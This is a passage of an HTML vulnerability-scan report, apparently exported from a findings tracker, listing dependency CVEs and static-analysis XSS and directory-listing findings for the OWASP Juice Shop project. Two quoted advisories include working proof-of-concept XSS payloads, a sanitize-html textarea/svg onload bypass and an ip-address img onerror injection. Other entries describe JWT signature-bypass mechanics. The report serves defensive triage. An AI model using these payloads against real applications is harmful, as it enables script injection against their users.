https://access.redhat.com/security/cve/CVE-2021-26539
+https://advisory.checkmarx.net/advisory/CX-2021-4308
+https://github.com/apostrophecms/sanitize-html
+https://github.com/apostrophecms/sanitize-html/blob/main/CHANGELOG.md#231-2021-01-22
+https://github.com/apostrophecms/sanitize-html/commit/bdf7836ef8f0e5b21f9a1aab0623ae8fcd09c1da
+https://github.com/apostrophecms/sanitize-html/pull/458
+https://nvd.nist.gov/vuln/detail/CVE-2021-26539
+https://www.cve.org/CVERecord?id=CVE-2021-26539

+ + + + + + + +
+
+
+
+ Finding 191: CVE-2021-26540 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

sanitize-html: improper + validation of hostnames set by the "allowedIframeHostnames" option can +lead to bypass hostname whitelist for iframe element
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.3.2

+

Apostrophe Technologies sanitize-html before 2.3.2 does not properly +validate the hostnames set by the "allowedIframeHostnames" option when +the "allowIframeRelativeUrls" is set to true, which allows attackers to +bypass hostname whitelist for iframe element, related using an src value + that starts with "/\example.com".

+ + +
Mitigation
+

2.3.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2021-26540
+https://advisory.checkmarx.net/advisory/CX-2021-4309
+https://github.com/apostrophecms/sanitize-html/blob/main/CHANGELOG.md#232-2021-01-26
+https://github.com/apostrophecms/sanitize-html/pull/460
+https://nvd.nist.gov/vuln/detail/CVE-2021-26540
+https://www.cve.org/CVERecord?id=CVE-2021-26540

+ + + + + + + +
+
+
+
+ Finding 192: CVE-2024-21501 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 200 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

sanitize-html: Information Exposure when used on the backend
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.12.1

+

Versions of the package sanitize-html before 2.12.1 are vulnerable to + Information Exposure when used on the backend and with the style +attribute allowed, allowing enumeration of files in the system +(including project dependencies). An attacker could exploit this +vulnerability to gather details about the file system structure and +dependencies of the targeted server.

+ + +
Mitigation
+

2.12.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-21501
+https://gist.github.com/Slonser/8b4d061abe6ee1b2e10c7242987674cf
+https://github.com/apostrophecms/apostrophe/discussions/4436
+https://github.com/apostrophecms/sanitize-html
+https://github.com/apostrophecms/sanitize-html/commit/c5dbdf77fe8b836d3bf4554ea39edb45281ec0b4
+https://github.com/apostrophecms/sanitize-html/pull/650
+https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EB5JPYRCTS64EA5AMV3INHDPI6I4AW7
+https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EB5JPYRCTS64EA5AMV3INHDPI6I4AW7/
+https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P4I5X6V3LYUNBMZ5YOW4BV427TH3IK4S
+https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P4I5X6V3LYUNBMZ5YOW4BV427TH3IK4S/
+https://nvd.nist.gov/vuln/detail/CVE-2024-21501
+https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6276557
+https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-6256334
+https://www.cve.org/CVERecord?id=CVE-2024-21501

+ + + + + + + +
+
+
+
+ Finding 98: CVE-2026-33916 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

+ + +
Description
+

handlebars.js: Handlebars: Cross-Site Scripting (XSS) via prototype pollution in partial resolution
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, resolvePartial() in the Handlebars runtime resolves partial names via a plain property lookup on options.partials without guarding against prototype-chain traversal. When Object.prototype + has been polluted with a string value whose key matches a partial +reference in a template, the polluted string is used as the partial body + and rendered without HTML escaping, resulting in reflected or stored +XSS. Version 4.7.9 fixes the issue. Some workarounds are available. +Apply Object.freeze(Object.prototype) early in application +startup to prevent prototype pollution. Note: this may break other +libraries, and/or use the Handlebars runtime-only build (handlebars/runtime), which does not compile templates and reduces the attack surface.

+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33916
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2qvq-rjwj-gvw9
+https://nvd.nist.gov/vuln/detail/CVE-2021-23369
+https://nvd.nist.gov/vuln/detail/CVE-2021-23383
+https://nvd.nist.gov/vuln/detail/CVE-2026-33916
+https://www.cve.org/CVERecord?id=CVE-2026-33916

+ + + + + + + +
+
+
+
+ Finding 99: GHSA-7rx3-28cr-v5wh Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

+ + +
Description
+

Handlebars.js has a Prototype Method Access Control Gap via Missing lookupSetter Blocklist Entry
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Summary

+

The prototype method blocklist in lib/handlebars/internal/proto-access.js blocks constructor, __defineGetter__, __defineSetter__, and __lookupGetter__, but omits the symmetric __lookupSetter__. This omission is only exploitable when the non-default runtime option allowProtoMethodsByDefault: true is explicitly set — in that configuration __lookupSetter__ becomes accessible while its counterparts remain blocked, creating an inconsistent security boundary.

+

4.6.0 is the version that introduced protoAccessControl and the allowProtoMethodsByDefault runtime option.

+

Description

+

In lib/handlebars/internal/proto-access.js:

+
const methodWhiteList = Object.create(null);
+methodWhiteList['constructor']      = false;
+methodWhiteList['__defineGetter__'] = false;
+methodWhiteList['__defineSetter__'] = false;
+methodWhiteList['__lookupGetter__'] = false;
+// __lookupSetter__ intentionally blocked in CVE-2021-23383,
+// but omitted here — creating an asymmetric blocklist
+
+ +

All four legacy accessor helpers (__defineGetter__, __defineSetter__, __lookupGetter__, __lookupSetter__) were involved in the exploit chain addressed by CVE-2021-23383. Three of the four were explicitly blocked; __lookupSetter__ was left out.

+

When allowProtoMethodsByDefault: true is set, any prototype method not present in methodWhiteList is permitted by default. Because __lookupSetter__ is absent from the list, it passes the checkWhiteList check and is accessible in templates, while __lookupGetter__ (its sibling) is correctly denied.

+

Workarounds

+
    +
  • Do not set allowProtoMethodsByDefault: true. The default configuration is not affected.
  • +
  • If allowProtoMethodsByDefault must be enabled, ensure templates do not reference __lookupSetter__ through untrusted input.
  • +
+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/advisories/GHSA-765h-qjxv-5f44
+https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-7rx3-28cr-v5wh

+ + + + + + + +
+
+
+
+ Finding 193: NSWG-ECO-154 Sanitize-HTML 1.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
sanitize-html1.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/package.json
+
+
+
+ + + + + +
Description
+

Cross Site Scripting
+Target: Node.js
+Type: node-pkg
+Fixed version: >=1.11.4

+

Sanitize-html is a library for scrubbing html input of malicious values.

+

Versions 1.11.1 and below are vulnerable to cross site scripting (XSS) in certain scenarios:

+

If allowed at least one nonTextTags, the result is a potential XSS vulnerability.
+PoC:

+
var sanitizeHtml = require('sanitize-html');
+
+var dirty = '!<textarea>&lt;/textarea&gt;<svg/onload=prompt`xs`&gt;</textarea>!';
+var clean = sanitizeHtml(dirty, {
+    allowedTags: [ 'textarea' ]
+});
+
+console.log(clean);
+
+// !<textarea></textarea><svg/onload=prompt`xs`></textarea>!
+
+ + +
Mitigation
+
+

=1.11.4

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403
+https://github.com/punkave/sanitize-html/issues/100

+ + + + + + + +
+
+
+
+ Finding 219: CVE-2025-56200 Validator 13.15.15 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
validator13.15.15
+ + + + + + + +
File Path
juice-shop/node_modules/validator/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

+ + +
Description
+

validator.js has a URL validation bypass vulnerability in its isURL function
+Target: Node.js
+Type: node-pkg
+Fixed version: 13.15.20

+

A URL validation bypass vulnerability exists in validator.js through +version 13.15.15. The isURL() function uses '://' as a delimiter to +parse protocols, while browsers use ':' as the delimiter. This parsing +difference allows attackers to bypass protocol and domain validation by +crafting URLs leading to XSS and Open Redirect attacks.

+ + +
Mitigation
+

13.15.20

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://validatorjs.com
+https://gist.github.com/junan-98/27ae092aa40e2a057d41a0f95148f666
+https://gist.github.com/junan-98/a93130505b258b9e4ec9f393e7533596
+https://github.com/validatorjs/validator.js
+https://github.com/validatorjs/validator.js/commit/cbef5088f02d36caf978f378bb845fe49bdc0809
+https://github.com/validatorjs/validator.js/issues/2600
+https://github.com/validatorjs/validator.js/pull/2608
+https://github.com/validatorjs/validator.js/releases/tag/13.15.20
+https://nvd.nist.gov/vuln/detail/CVE-2025-56200

+ + + + + + + +
+
+
+
+ Finding 103: CVE-2026-42338 Ip-Address 10.0.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
ip-address10.0.1
+ + + + + + + +
File Path
juice-shop/node_modules/ip-address/package.json
+
+
+
+ + + + + +
Description
+

ip-address has XSS in Address6 HTML-emitting methods
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.1.1

+

Summary

+

Address6.group() and Address6.link() do not HTML-escape attacker-controlled content before embedding it in the HTML strings they return, and AddressError.parseMessage (emitted by the Address6 + constructor for invalid input) can contain unescaped +attacker-controlled content in one branch. An application that (1) +passes untrusted input to Address6 and (2) renders the output of these methods, or the thrown error's parseMessage, as HTML (e.g. via innerHTML) is vulnerable to cross-site scripting. A related issue in v6.helpers.spanAll() produced malformed markup but was not exploitable; it is hardened in the same release for consistency.

+

Details

+

Four related issues were identified and fixed together:

+
    +
  1. Address6.group(): zone ID injection. The Address6 constructor stores the raw input (including any IPv6 zone ID) in this.address before zone stripping. group() then passed this.address to helpers.simpleGroup(), which wrapped each :-separated segment in a <span> element without HTML-escaping the content. A zone ID containing HTML markup was embedded verbatim.
  2. +
  3. Address6.link({ prefix, className }): attribute-value injection. link() concatenated user-supplied prefix and className into the href="…" and class="…" attributes without escaping. A caller passing untrusted content through these options could inject event handlers (e.g. onmouseover) and achieve XSS.
  4. +
  5. Address6 constructor: leading-zero IPv4 error path. The leading-zero branch in parse4in6() built AddressError.parseMessage by concatenating the raw address through String.replace(). Because parse4in6() + runs before the bad-character check, any characters in the groups +preceding the IPv4 suffix flowed into the error's HTML unescaped. +Consumers who render parseMessage as HTML (its documented purpose — it already contains <span class="parse-error"> markup) could be XSS'd by a crafted input such as <img src=x onerror=alert(1)>:10.0.01.1.
  6. +
  7. v6.helpers.spanAll(): attribute-value injection (defense in depth). spanAll() embedded each character of its input into a class="digit value-${n} …" attribute without escaping. Because split('') limits n to a single character this was not exploitable in practice, but it produced malformed markup and is fixed for consistency.
  8. +
+

Affected Versions

+

All versions up to and including 10.1.0.

+

Patched Version

+

10.1.1.

+

Impact

+

Real-world exposure is believed to be extremely limited. Analysis of +all 425 dependent npm packages as well as GitHub code search found zero +consumers of group(), link(), or spanAll(): + these HTML-emitting surfaces appear to be unused across published npm +packages and public repositories. Applications using only the +address-parsing and comparison APIs (isValid, correctForm, isInSubnet, bigInt, etc.) are not affected.

+

Consumers who do render the output of group(), link(), spanAll(), or AddressError.parseMessage as HTML against untrusted input should upgrade.

+

PoC

+
const { Address6 } = require('ip-address');
+const addr = new Address6('fe80::1%<img src=x onerror=alert(1)>');
+document.body.innerHTML = addr.group();  // fires the onerror handler in 10.1.0
+
+ +

Workarounds

+

If users cannot upgrade immediately:

+
    +
  • Do not pass untrusted input to the Address6 constructor, or
  • +
  • Never render the output of group(), link(), or spanAll(), nor the parseMessage field of any thrown AddressError, as HTML; treat these values as text only, or run them through DOMPurify before inserting into the DOM (DOMPurify's default configuration preserves the library's intended <span> wrapping while stripping any injected event handlers), or
  • +
  • Validate input with Address6.isValid() and reject anything that contains a zone identifier (a % character) or characters outside [0-9a-fA-F:/] before passing it to the constructor.
  • +
+

Lack of separate CVEs

+

Given the evidence that these methods are not used, and given that +they are all of the same construction, maintainers do not think it's +relevant or useful to create a separate CVE for each library method.

+

Credit

+

ip-address thanks @scovetta for reporting this issue.

+ + +
Mitigation
+

10.1.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/beaugunderson/ip-address
+https://github.com/beaugunderson/ip-address/security/advisories/GHSA-v2v4-37r5-5v8g

+ + + + + + + +
+
+
+
+ Finding 104: CVE-2025-64718 Js-Yaml 3.14.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
js-yaml3.14.1
+ + + + + + + +
File Path
juice-shop/node_modules/js-yaml/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

js-yaml: js-yaml prototype pollution in merge
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.1.1, 3.14.2

+

js-yaml is a JavaScript YAML parser and dumper. In js-yaml before +4.1.1 and 3.14.2, it's possible for an attacker to modify the prototype +of the result of a parsed yaml document via prototype pollution (__proto__). + All users who parse untrusted yaml documents may be impacted. The +problem is patched in js-yaml 4.1.1 and 3.14.2. Users can protect +against this kind of attack on the server by using node --disable-proto=delete or deno (in Deno, pollution protection is on by default).

+ + +
Mitigation
+

4.1.1, 3.14.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-64718
+https://github.com/advisories/GHSA-mh29-5h37-fv8m
+https://github.com/nodeca/js-yaml
+https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879
+https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266
+https://github.com/nodeca/js-yaml/issues/730#issuecomment-3549635876
+https://github.com/nodeca/js-yaml/security/advisories/GHSA-mh29-5h37-fv8m
+https://nvd.nist.gov/vuln/detail/CVE-2025-64718
+https://www.cve.org/CVERecord?id=CVE-2025-64718

+ + + + + + + +
+
+
+
+ Finding 26: generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
21
+ + + + + + + +
File Path
/src/views/dataErasureForm.hbs
+
+
+
+ + + + + +
Description
+

Result message: + Detected a unquoted template variable as an attribute. If unquoted, a +malicious actor could inject custom JavaScript handlers. To fix this, +add quotes around the template expression, like this: "{{ expr }}".

+ + + + + + + + + + + + +
References
+

https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss

+ + + + + + + +
+
+
+
+ Finding 195: CVE-2024-38355 socket.io 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
socket.io3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/socket.io/package.json
+
+
+
+ + + + + +
Description
+

socket.io: Unhandled 'error' event
+Target: Node.js
+Type: node-pkg
+Fixed version: 2.5.1, 4.6.2

+

Socket.IO is an open source, real-time, bidirectional, event-based, +communication framework. A specially crafted Socket.IO packet can +trigger an uncaught exception on the Socket.IO server, thus killing the +Node.js process. This issue is fixed by commit 15af22fc22 which has been included in socket.io@4.6.2 (released in May 2023). The fix was backported in the 2.x branch as well with commit d30630ba10. Users are advised to upgrade. Users unable to upgrade may attach a listener for the "error" event to catch these errors.

+ + +
Mitigation
+

2.5.1, 4.6.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-38355
+https://github.com/socketio/socket.io
+https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115
+https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c
+https://github.com/socketio/socket.io/security/advisories/GHSA-25hc-qcg6-38wj
+https://nvd.nist.gov/vuln/detail/CVE-2024-38355
+https://www.cve.org/CVERecord?id=CVE-2024-38355
+https://www.vicarius.io/vsociety/posts/unhandled-exception-in-socketio-cve-2024-38355

+ + + + + + + +
+
+
+
+ Finding 22: +javascript.express.security.audit.express-check-directory- +listing.express-check-directory-listing + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 548 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
269
+ + + + + + + +
File Path
/src/server.ts
+
+
+
+ + + + + +
Description
+

Result message: + Directory listing/indexing is enabled, which may lead to disclosure of +sensitive directories and files. It is recommended to disable directory +listing unless it is a public resource. If you need directory listing, +ensure that sensitive files are inaccessible when querying the resource.

+ + + + + + + + + + + + +
References
+

https://www.npmjs.com/package/serve-index
+https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/

+ + + + + + + +
+
+
+
+ Finding 108: CVE-2022-23540 Jsonwebtoken 0.1.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 287 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.1.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L

+ + +
Description
+

jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: 9.0.0

+

In versions <=8.5.1 of jsonwebtoken library, lack of algorithm definition in the jwt.verify() function can lead to signature validation bypass due to defaulting to the none algorithm for signature verification. Users are affected if you do not specify algorithms in the jwt.verify() + function. This issue has been fixed, please update to version 9.0.0 +which removes the default support for the none algorithm in the jwt.verify() method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the none algorithm. If you need 'none' algorithm, you have to explicitly specify that in jwt.verify() options.

+ + +
Mitigation
+

9.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-23540
+https://github.com/auth0/node-jsonwebtoken
+https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3
+https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-qwph-4952-7xr6
+https://nvd.nist.gov/vuln/detail/CVE-2022-23540
+https://security.netapp.com/advisory/ntap-20240621-0007
+https://security.netapp.com/advisory/ntap-20240621-0007/
+https://www.cve.org/CVERecord?id=CVE-2022-23540

+ + + + + + + +
+
+
+
+ Finding 109: CVE-2022-23541 Jsonwebtoken 0.1.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 287 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.1.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

+ + +
Description
+

jsonwebtoken: Insecure implementation of key retrieval function could lead to Forgeable Public/Private Tokens from RSA to HMAC
+Target: Node.js
+Type: node-pkg
+Fixed version: 9.0.0

+

jsonwebtoken is an implementation of JSON Web Tokens. Versions <= 8.5.1 of jsonwebtoken library can be misconfigured so that passing a poorly implemented key retrieval function referring to the secretOrPublicKey + argument from the readme link will result in incorrect verification of +tokens. There is a possibility of using a different algorithm and key +combination in verification, other than the one that was used to sign +the tokens. Specifically, tokens signed with an asymmetric public key +could be verified with a symmetric HS256 algorithm. This can lead to +successful validation of forged tokens. If your application is +supporting usage of both symmetric key and asymmetric key in +jwt.verify() implementation with the same key retrieval function. This +issue has been patched, please update to version 9.0.0.

+ + +
Mitigation
+

9.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-23541
+https://github.com/auth0/node-jsonwebtoken
+https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3
+https://github.com/auth0/node-jsonwebtoken/releases/tag/v9.0.0
+https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959
+https://nvd.nist.gov/vuln/detail/CVE-2022-23541
+https://security.netapp.com/advisory/ntap-20240621-0007
+https://security.netapp.com/advisory/ntap-20240621-0007/
+https://www.cve.org/CVERecord?id=CVE-2022-23541

+ + + + + + + +
+
+
+
+ Finding 25: +javascript.express.security.audit.express-check-directory- +listing.express-check-directory-listing + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 548 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
281
+ + + + + + + +
File Path
/src/server.ts
+
+
+
+ + + + + +
Description
+

Result message: + Directory listing/indexing is enabled, which may lead to disclosure of +sensitive directories and files. It is recommended to disable directory +listing unless it is a public resource. If you need directory listing, +ensure that sensitive files are inaccessible when querying the resource.

+ + + + + + + + + + + + +
References
+

https://www.npmjs.com/package/serve-index
+https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/

+ + + + + + + +
+
+
+
+ Finding 197: CVE-2023-32695 socket.io-parser 4.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
socket.io-parser4.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/socket.io-parser/package.json
+
+
+
+ + + + + +
Description
+

socket.io parser is a socket.io encoder and decoder written in JavaScr ...
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.2.3, 3.4.3, 3.3.4

+

socket.io parser is a socket.io encoder and decoder written in +JavaScript complying with version 5 of socket.io-protocol. A specially +crafted Socket.IO packet can trigger an uncaught exception on the +Socket.IO server, thus killing the Node.js process. A patch has been +released in version 4.2.3.

+ + +
Mitigation
+

4.2.3, 3.4.3, 3.3.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/socketio/socket.io-parser
+https://github.com/socketio/socket.io-parser/commit/1c220ddbf45ea4b44bc8dbf6f9ae245f672ba1b9
+https://github.com/socketio/socket.io-parser/commit/2dc3c92622dad113b8676be06f23b1ed46b02ced
+https://github.com/socketio/socket.io-parser/commit/3b78117bf6ba7e99d7a5cfc1ba54d0477554a7f3
+https://github.com/socketio/socket.io-parser/commit/ee006607495eca4ec7262ad080dd3a91439a5ba4
+https://github.com/socketio/socket.io-parser/releases/tag/4.2.3
+https://github.com/socketio/socket.io-parser/security/advisories/GHSA-cqmj-92xf-r6r9
+https://nvd.nist.gov/vuln/detail/CVE-2023-32695

+ + + + + + + +
+
+
+
+ Finding 21: +javascript.lang.security.audit.unknown-value-with-script-tag.unknown- +value-with-script-tag + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
71
+ + + + + + + +
File Path
/src/routes/videoHandler.ts
+
+
+
+ + + + + +
Description
+

Result message: + Cannot determine what 'subs' is and it is used with a '<script>' +tag. This could be susceptible to cross-site scripting (XSS). Ensure +'subs' is not externally controlled, or sanitize this data.

+ + + + + + + + + + + + +
References
+

